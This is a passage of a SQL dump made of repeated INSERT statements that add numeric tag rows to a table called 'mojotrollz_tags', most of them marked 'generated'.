(2981, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2982, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2984, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2985, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2985, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2986, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2987, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2988, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2989, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2990, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2990, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2991, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2991, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2992, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2993, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2993, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2994, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2994, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2995, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2995, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2996, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2997, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2998, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2999, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3000, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3000, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3001, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3002, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3002, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3003, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3004, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3004, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3005, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3005, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3007, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3008, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3008, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3009, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3009, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3010, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3010, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3011, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3012, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3013, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3013, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3014, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3014, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3015, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3016, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3017, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3018, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3020, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3020, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3021, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3022, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3023, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3023, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3024, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3025, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3026, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3027, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3028, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3029, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3030, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3031, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3032, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3033, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3034, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3035, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3035, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3036, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3037, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3037, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3038, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3039, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3039, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3040, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3040, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3041, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3042, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3043, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3044, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3045, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3045, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3046, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3047, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3048, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3049, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3050, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3051, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3052, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3052, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3053, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3054, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3054, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3055, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3056, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3056, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3057, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3057, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3058, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3058, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3059, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3059, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3060, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3060, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3061, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3061, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3062, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3062, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3063, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3063, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3064, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3064, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3065, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3065, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3066, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3066, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3067, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3067, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3068, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3068, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3069, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3072, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3073, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3074, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3075, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3076, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3077, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3078, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3079, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3080, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3080, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3081, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3083, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3084, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3084, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3085, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3086, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3087, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3088, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3088, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3089, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3090, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3091, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3091, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3092, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3093, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3095, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3095, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3096, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3097, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 1, 4, 1, NULL); INSERT INTO 